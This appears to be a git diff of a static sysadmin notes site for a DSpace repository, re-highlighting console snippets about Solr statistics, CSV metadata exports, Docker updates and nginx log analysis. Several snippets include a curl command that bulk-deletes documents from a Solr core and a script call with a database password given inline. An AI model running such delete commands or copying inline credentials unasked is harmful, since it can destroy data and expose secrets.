                                                                                                                                                                                                                                                                                                                                                                                                                                Summary of unmigrated docs after processing:

                                                                                                                                                                                                                                                                                                                                                                                                                                • 0: (*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)
                                                                                                                                                                                                                                                                                                                                                                                                                                • 1,012: id:/.+-unmigrated/
                                                                                                                                                                                                                                                                                                                                                                                                                                • 1,012: *:* NOT id:/.{36}/
                                                                                                                                                                                                                                                                                                                                                                                                                                • 654 are type: 3 (COLLECTION), which is different than I’ve seen previously… but I suppose I still have to purge them because there will be errors in the Atmire modules otherwise:
                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                $ curl -s "http://localhost:8081/solr/statistics-2010/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>*:* NOT id:/.{36}/</query></delete>"
                                                                                                                                                                                                                                                                                                                                                                                                                                -

                                                                                                                                                                                                                                                                                                                                                                                                                                Processing Solr statistics with AtomicStatisticsUpdateCLI

                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                $ curl -s "http://localhost:8081/solr/statistics-2010/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>*:* NOT id:/.{36}/</query></delete>"
                                                                                                                                                                                                                                                                                                                                                                                                                                +
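The counts in the summaries above (for example 1,012 for `id:/.+-unmigrated/`) can be re-checked before and after a purge. The following is a minimal sketch, not the method used in these notes: `count_docs` and `delete_body` are hypothetical helper names, the Solr base URL is assumed to match the `curl` commands above, and the `sed` extraction assumes Solr's JSON response contains a `"numFound":N` field with no space after the colon.

```shell
#!/bin/sh
# Assumption: same Solr base URL as in the curl commands above.
SOLR_BASE="${SOLR_BASE:-http://localhost:8081/solr}"

# Build the XML body for a delete-by-query request.
# Note: the query is inserted as-is, so it must not contain '<' or '&'.
delete_body() {
    printf '<delete><query>%s</query></delete>' "$1"
}

# Print how many documents in a core match a query.
# rows=0 asks Solr for the count only; curl URL-encodes the query for us.
count_docs() {
    core="$1"
    query="$2"
    curl -s -G "$SOLR_BASE/$core/select" \
        --data-urlencode "q=$query" \
        --data-urlencode "rows=0" \
        --data-urlencode "wt=json" \
    | sed -n 's/.*"numFound":\([0-9]*\).*/\1/p'
}

# Example usage (requires a running Solr, so it is left commented out):
#   count_docs statistics-2010 'id:/.+-unmigrated/'
#   count_docs statistics-2010 '*:* NOT id:/.{36}/'
#   curl -s "$SOLR_BASE/statistics-2010/update?softCommit=true" \
#       -H "Content-Type: text/xml" \
#       --data-binary "$(delete_body '*:* NOT id:/.{36}/')"
```

Running `count_docs` again after the delete should print 0 for both queries if the purge worked.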

                                                                                                                                                                                                                                                                                                                                                                                                                                Processing Solr statistics with AtomicStatisticsUpdateCLI

                                                                                                                                                                                                                                                                                                                                                                                                                                On 2020-11-18 I finished processing the Solr statistics with solr-upgrade-statistics-6x and I started processing them with AtomicStatisticsUpdateCLI.

                                                                                                                                                                                                                                                                                                                                                                                                                                statistics

                                                                                                                                                                                                                                                                                                                                                                                                                                First the current year’s statistics core, in 12-hour batches:

                                                                                                                                                                                                                                                                                                                                                                                                                                diff --git a/docs/index.html b/docs/index.html index c15f6afee..1ff179ff5 100644 --- a/docs/index.html +++ b/docs/index.html @@ -10,14 +10,14 @@ - + - + @@ -109,11 +109,11 @@
                                                                                                                                                                                                                                                                                                                                                                                                                                • Send Gaia the last batch of potential duplicates for items 701 to 980:
                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                $ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                -$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p 'fuuu' -o /tmp/2022-03-01-tac-batch4-701-980.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                -$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4-filenames.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                -$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv > /tmp/2022-03-01-tac-batch4-701-980-filenames.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                $ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                +$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p 'fuuu' -o /tmp/2022-03-01-tac-batch4-701-980.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                +$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4-filenames.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                +$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv > /tmp/2022-03-01-tac-batch4-701-980-filenames.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                Read more → @@ -185,13 +185,13 @@ $ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv &
                                                                                                                                                                                                                                                                                                                                                                                                                              • Atmire merged some changes I had submitted to the COUNTER-Robots project
                                                                                                                                                                                                                                                                                                                                                                                                                              • I updated our local spider user agents and then re-ran the list with my check-spider-hits.sh script on CGSpace:
                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                              $ ./ilri/check-spider-hits.sh -f /tmp/agents -p  
                                                                                                                                                                                                                                                                                                                                                                                                                              -Purging 1989 hits from The Knowledge AI in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                              -Purging 1235 hits from MaCoCu in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                              -Purging 455 hits from WhatsApp in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                              -Total number of bot hits purged: 3679
                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                              $ ./ilri/check-spider-hits.sh -f /tmp/agents -p  
                                                                                                                                                                                                                                                                                                                                                                                                                              +Purging 1989 hits from The Knowledge AI in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                              +Purging 1235 hits from MaCoCu in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                              +Purging 455 hits from WhatsApp in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                              +Total number of bot hits purged: 3679
                                                                                                                                                                                                                                                                                                                                                                                                                              +
 Read more →
@@ -214,9 +214,9 @@ Purging 455 hits from WhatsApp in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                            • I experimented with manually sharding the Solr statistics on DSpace Test
                                                                                                                                                                                                                                                                                                                                                                                                                            • First I exported all the 2019 stats from CGSpace:
                                                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                                                            $ ./run.sh -s http://localhost:8081/solr/statistics -f 'time:2019-*' -a export -o statistics-2019.json -k uid
                                                                                                                                                                                                                                                                                                                                                                                                                            -$ zstd statistics-2019.json
                                                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                                                                            $ ./run.sh -s http://localhost:8081/solr/statistics -f 'time:2019-*' -a export -o statistics-2019.json -k uid
                                                                                                                                                                                                                                                                                                                                                                                                                            +$ zstd statistics-2019.json
                                                                                                                                                                                                                                                                                                                                                                                                                            +
 Read more →
@@ -238,15 +238,15 @@ $ zstd statistics-2019.json
                                                                                                                                                                                                                                                                                                                                                                                                                            • Export all affiliations on CGSpace and run them against the latest RoR data dump:
                                                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                                                            localhost/dspace63= > \COPY (SELECT DISTINCT text_value as "cg.contributor.affiliation", count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-10-01-affiliations.csv WITH CSV HEADER;
                                                                                                                                                                                                                                                                                                                                                                                                                            -$ csvcut -c 1 /tmp/2021-10-01-affiliations.csv | sed 1d > /tmp/2021-10-01-affiliations.txt
                                                                                                                                                                                                                                                                                                                                                                                                                            -$ ./ilri/ror-lookup.py -i /tmp/2021-10-01-affiliations.txt -r 2021-09-23-ror-data.json -o /tmp/2021-10-01-affili
                                                                                                                                                                                                                                                                                                                                                                                                                            -ations-matching.csv
                                                                                                                                                                                                                                                                                                                                                                                                                            -$ csvgrep -c matched -m true /tmp/2021-10-01-affiliations-matching.csv | sed 1d | wc -l 
                                                                                                                                                                                                                                                                                                                                                                                                                            -1879
                                                                                                                                                                                                                                                                                                                                                                                                                            -$ wc -l /tmp/2021-10-01-affiliations.txt 
                                                                                                                                                                                                                                                                                                                                                                                                                            -7100 /tmp/2021-10-01-affiliations.txt
                                                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                              localhost/dspace63= > \COPY (SELECT DISTINCT text_value as "cg.contributor.affiliation", count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-10-01-affiliations.csv WITH CSV HEADER;
                                                                                                                                                                                                                                                                                                                                                                                                                              +$ csvcut -c 1 /tmp/2021-10-01-affiliations.csv | sed 1d > /tmp/2021-10-01-affiliations.txt
                                                                                                                                                                                                                                                                                                                                                                                                                              +$ ./ilri/ror-lookup.py -i /tmp/2021-10-01-affiliations.txt -r 2021-09-23-ror-data.json -o /tmp/2021-10-01-affili
                                                                                                                                                                                                                                                                                                                                                                                                                              +ations-matching.csv
                                                                                                                                                                                                                                                                                                                                                                                                                              +$ csvgrep -c matched -m true /tmp/2021-10-01-affiliations-matching.csv | sed 1d | wc -l 
                                                                                                                                                                                                                                                                                                                                                                                                                              +1879
                                                                                                                                                                                                                                                                                                                                                                                                                              +$ wc -l /tmp/2021-10-01-affiliations.txt 
                                                                                                                                                                                                                                                                                                                                                                                                                              +7100 /tmp/2021-10-01-affiliations.txt
                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                              • So we have 1879/7100 (26.46%) matching already
 Read more →
@@ -303,8 +303,8 @@ $ wc -l /tmp/2021-10-01-affiliations.txt
                                                                                                                                                                                                                                                                                                                                                                                                                              • Update Docker images on AReS server (linode20) and reboot the server:
                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                              # docker images | grep -v ^REPO | sed 's/ \+/:/g' | cut -d: -f1,2 | grep -v none | xargs -L1 docker pull
                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                # docker images | grep -v ^REPO | sed 's/ \+/:/g' | cut -d: -f1,2 | grep -v none | xargs -L1 docker pull
                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                • I decided to upgrade linode20 from Ubuntu 18.04 to 20.04
 Read more →
@@ -328,9 +328,9 @@ $ wc -l /tmp/2021-10-01-affiliations.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                • Export another list of ALL subjects on CGSpace, including AGROVOC and non-AGROVOC for Enrico:
                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                localhost/dspace63= > \COPY (SELECT DISTINCT LOWER(text_value) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 215, 123, 236, 242, 187) GROUP BY subject ORDER BY count DESC) to /tmp/2021-07-01-all-subjects.csv WITH CSV HEADER;
-COPY 20994
-
+
localhost/dspace63= > \COPY (SELECT DISTINCT LOWER(text_value) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 215, 123, 236, 242, 187) GROUP BY subject ORDER BY count DESC) to /tmp/2021-07-01-all-subjects.csv WITH CSV HEADER;
+COPY 20994
+
                                                                                                                                                                                                                                                                                                                                                                                                                                Read more → diff --git a/docs/index.xml b/docs/index.xml index 880e40a9a..a1ae614b7 100644 --- a/docs/index.xml +++ b/docs/index.xml @@ -17,11 +17,11 @@ <ul> <li>Send Gaia the last batch of potential duplicates for items 701 to 980:</li> </ul> -<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &gt; /tmp/tac4.csv -$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -o /tmp/2022-03-01-tac-batch4-701-980.csv -$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &gt; /tmp/tac4-filenames.csv -$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv &gt; /tmp/2022-03-01-tac-batch4-701-980-filenames.csv -</code></pre></div> +<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &gt; /tmp/tac4.csv +</span></span><span style="display:flex;"><span>$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -o /tmp/2022-03-01-tac-batch4-701-980.csv +</span></span><span 
style="display:flex;"><span>$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &gt; /tmp/tac4-filenames.csv +</span></span><span style="display:flex;"><span>$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv &gt; /tmp/2022-03-01-tac-batch4-701-980-filenames.csv +</span></span></code></pre></div> @@ -66,13 +66,13 @@ $ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv & <li>Atmire merged some changes I had submitted to the COUNTER-Robots project</li> <li>I updated our local spider user agents and then re-ran the list with my <code>check-spider-hits.sh</code> script on CGSpace:</li> </ul> -<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./ilri/check-spider-hits.sh -f /tmp/agents -p -Purging 1989 hits from The Knowledge AI in statistics -Purging 1235 hits from MaCoCu in statistics -Purging 455 hits from WhatsApp in statistics -<span style="color:#960050;background-color:#1e0010"> -</span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 3679 -</code></pre></div> +<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-spider-hits.sh -f /tmp/agents -p +</span></span><span style="display:flex;"><span>Purging 1989 hits from The Knowledge AI in statistics +</span></span><span style="display:flex;"><span>Purging 1235 hits from MaCoCu in statistics +</span></span><span style="display:flex;"><span>Purging 455 hits from WhatsApp in statistics +</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"> +</span></span></span><span style="display:flex;"><span><span 
style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 3679 +</span></span></code></pre></div> @@ -86,9 +86,9 @@ Purging 455 hits from WhatsApp in statistics <li>I experimented with manually sharding the Solr statistics on DSpace Test</li> <li>First I exported all the 2019 stats from CGSpace:</li> </ul> -<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./run.sh -s http://localhost:8081/solr/statistics -f <span style="color:#e6db74">&#39;time:2019-*&#39;</span> -a export -o statistics-2019.json -k uid -$ zstd statistics-2019.json -</code></pre></div> +<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./run.sh -s http://localhost:8081/solr/statistics -f <span style="color:#e6db74">&#39;time:2019-*&#39;</span> -a export -o statistics-2019.json -k uid +</span></span><span style="display:flex;"><span>$ zstd statistics-2019.json +</span></span></code></pre></div> @@ -101,15 +101,15 @@ $ zstd statistics-2019.json <ul> <li>Export all affiliations on CGSpace and run them against the latest RoR data dump:</li> </ul> -<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">localhost/dspace63= &gt; \COPY (SELECT DISTINCT text_value as &#34;cg.contributor.affiliation&#34;, count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-10-01-affiliations.csv WITH CSV HEADER; -$ csvcut -c <span style="color:#ae81ff">1</span> /tmp/2021-10-01-affiliations.csv | sed 1d &gt; /tmp/2021-10-01-affiliations.txt -$ ./ilri/ror-lookup.py -i 
/tmp/2021-10-01-affiliations.txt -r 2021-09-23-ror-data.json -o /tmp/2021-10-01-affili -ations-matching.csv -$ csvgrep -c matched -m true /tmp/2021-10-01-affiliations-matching.csv | sed 1d | wc -l -1879 -$ wc -l /tmp/2021-10-01-affiliations.txt -7100 /tmp/2021-10-01-affiliations.txt -</code></pre></div><ul> +<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; \COPY (SELECT DISTINCT text_value as &#34;cg.contributor.affiliation&#34;, count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-10-01-affiliations.csv WITH CSV HEADER; +</span></span><span style="display:flex;"><span>$ csvcut -c <span style="color:#ae81ff">1</span> /tmp/2021-10-01-affiliations.csv | sed 1d &gt; /tmp/2021-10-01-affiliations.txt +</span></span><span style="display:flex;"><span>$ ./ilri/ror-lookup.py -i /tmp/2021-10-01-affiliations.txt -r 2021-09-23-ror-data.json -o /tmp/2021-10-01-affili +</span></span><span style="display:flex;"><span>ations-matching.csv +</span></span><span style="display:flex;"><span>$ csvgrep -c matched -m true /tmp/2021-10-01-affiliations-matching.csv | sed 1d | wc -l +</span></span><span style="display:flex;"><span>1879 +</span></span><span style="display:flex;"><span>$ wc -l /tmp/2021-10-01-affiliations.txt +</span></span><span style="display:flex;"><span>7100 /tmp/2021-10-01-affiliations.txt +</span></span></code></pre></div><ul> <li>So we have 1879/7100 (26.46%) matching already</li> </ul> @@ -148,8 +148,8 @@ $ wc -l /tmp/2021-10-01-affiliations.txt <ul> <li>Update Docker images on AReS server (linode20) and reboot the server:</li> </ul> -<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code 
class="language-console" data-lang="console"># docker images | grep -v ^REPO | sed <span style="color:#e6db74">&#39;s/ \+/:/g&#39;</span> | cut -d: -f1,2 | grep -v none | xargs -L1 docker pull -</code></pre></div><ul> +<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># docker images | grep -v ^REPO | sed <span style="color:#e6db74">&#39;s/ \+/:/g&#39;</span> | cut -d: -f1,2 | grep -v none | xargs -L1 docker pull +</span></span></code></pre></div><ul> <li>I decided to upgrade linode20 from Ubuntu 18.04 to 20.04</li> </ul> @@ -164,9 +164,9 @@ $ wc -l /tmp/2021-10-01-affiliations.txt <ul> <li>Export another list of ALL subjects on CGSpace, including AGROVOC and non-AGROVOC for Enrico:</li> </ul> -<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">localhost/dspace63= &gt; \COPY (SELECT DISTINCT LOWER(text_value) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 215, 123, 236, 242, 187) GROUP BY subject ORDER BY count DESC) to /tmp/2021-07-01-all-subjects.csv WITH CSV HEADER; -COPY 20994 -</code></pre></div> +<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; \COPY (SELECT DISTINCT LOWER(text_value) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 215, 123, 236, 242, 187) GROUP BY subject ORDER BY count DESC) to 
/tmp/2021-07-01-all-subjects.csv WITH CSV HEADER; +</span></span><span style="display:flex;"><span>COPY 20994 +</span></span></code></pre></div> @@ -271,17 +271,17 @@ COPY 20994 <li>I had a call with CodeObia to discuss the work on OpenRXV</li> <li>Check the results of the AReS harvesting from last night:</li> </ul> -<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;</span> -{ - &#34;count&#34; : 100875, - &#34;_shards&#34; : { - &#34;total&#34; : 1, - &#34;successful&#34; : 1, - &#34;skipped&#34; : 0, - &#34;failed&#34; : 0 - } -} -</code></pre></div> +<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;</span> +</span></span><span style="display:flex;"><span>{ +</span></span><span style="display:flex;"><span> &#34;count&#34; : 100875, +</span></span><span style="display:flex;"><span> &#34;_shards&#34; : { +</span></span><span style="display:flex;"><span> &#34;total&#34; : 1, +</span></span><span style="display:flex;"><span> &#34;successful&#34; : 1, +</span></span><span style="display:flex;"><span> &#34;skipped&#34; : 0, +</span></span><span style="display:flex;"><span> &#34;failed&#34; : 0 +</span></span><span style="display:flex;"><span> } +</span></span><span style="display:flex;"><span>} +</span></span></code></pre></div> @@ -599,17 +599,17 @@ COPY 20994 </ul> </li> </ul> -<pre tabindex="0"><code># zcat --force /var/log/nginx/*access.log.*.gz | grep -cE &quot;[0-9]{1,2}/Oct/2019&quot; +<pre tabindex="0"><code># zcat --force /var/log/nginx/*access.log.*.gz 
| grep -cE &#34;[0-9]{1,2}/Oct/2019&#34; 4671942 -# zcat --force /var/log/nginx/{rest,oai,statistics}.log.*.gz | grep -cE &quot;[0-9]{1,2}/Oct/2019&quot; +# zcat --force /var/log/nginx/{rest,oai,statistics}.log.*.gz | grep -cE &#34;[0-9]{1,2}/Oct/2019&#34; 1277694 </code></pre><ul> <li>So 4.6 million from XMLUI and another 1.2 million from API requests</li> <li>Let&rsquo;s see how many of the REST API requests were for bitstreams (because they are counted in Solr stats):</li> </ul> -<pre tabindex="0"><code># zcat --force /var/log/nginx/rest.log.*.gz | grep -c -E &quot;[0-9]{1,2}/Oct/2019&quot; +<pre tabindex="0"><code># zcat --force /var/log/nginx/rest.log.*.gz | grep -c -E &#34;[0-9]{1,2}/Oct/2019&#34; 1183456 -# zcat --force /var/log/nginx/rest.log.*.gz | grep -E &quot;[0-9]{1,2}/Oct/2019&quot; | grep -c -E &quot;/rest/bitstreams&quot; +# zcat --force /var/log/nginx/rest.log.*.gz | grep -E &#34;[0-9]{1,2}/Oct/2019&#34; | grep -c -E &#34;/rest/bitstreams&#34; 106781 </code></pre> @@ -620,7 +620,7 @@ COPY 20994 Tue, 01 Oct 2019 13:20:51 +0300 https://alanorth.github.io/cgspace-notes/2019-10/ - 2019-10-01 Udana from IWMI asked me for a CSV export of their community on CGSpace I exported it, but a quick run through the csv-metadata-quality tool shows that there are some low-hanging fruits we can fix before I send him the data I will limit the scope to the titles, regions, subregions, and river basins for now to manually fix some non-breaking spaces (U+00A0) there that would otherwise be removed by the csv-metadata-quality script&rsquo;s &ldquo;unneccesary Unicode&rdquo; fix: $ csvcut -c 'id,dc. 
+ 2019-10-01 Udana from IWMI asked me for a CSV export of their community on CGSpace I exported it, but a quick run through the csv-metadata-quality tool shows that there are some low-hanging fruits we can fix before I send him the data I will limit the scope to the titles, regions, subregions, and river basins for now to manually fix some non-breaking spaces (U+00A0) there that would otherwise be removed by the csv-metadata-quality script&rsquo;s &ldquo;unneccesary Unicode&rdquo; fix: $ csvcut -c &#39;id,dc. @@ -634,7 +634,7 @@ COPY 20994 <li>Linode emailed to say that CGSpace (linode18) had a high rate of outbound traffic for several hours this morning</li> <li>Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:</li> </ul> -<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &quot;01/Sep/2019:0&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10 +<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &#34;01/Sep/2019:0&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10 440 17.58.101.255 441 157.55.39.101 485 207.46.13.43 @@ -645,7 +645,7 @@ COPY 20994 814 207.46.13.212 2472 163.172.71.23 6092 3.94.211.189 -# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &quot;01/Sep/2019:0&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10 +# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &#34;01/Sep/2019:0&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10 33 2a01:7e00::f03c:91ff:fe16:fcb 57 3.83.192.124 57 3.87.77.25 @@ -761,16 +761,16 @@ DELETE 1 </ul> </li> </ul> -<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep 'Spore-192-EN-web.pdf' | grep -E '(18.196.196.108|18.195.78.144|18.195.218.6)' | awk 
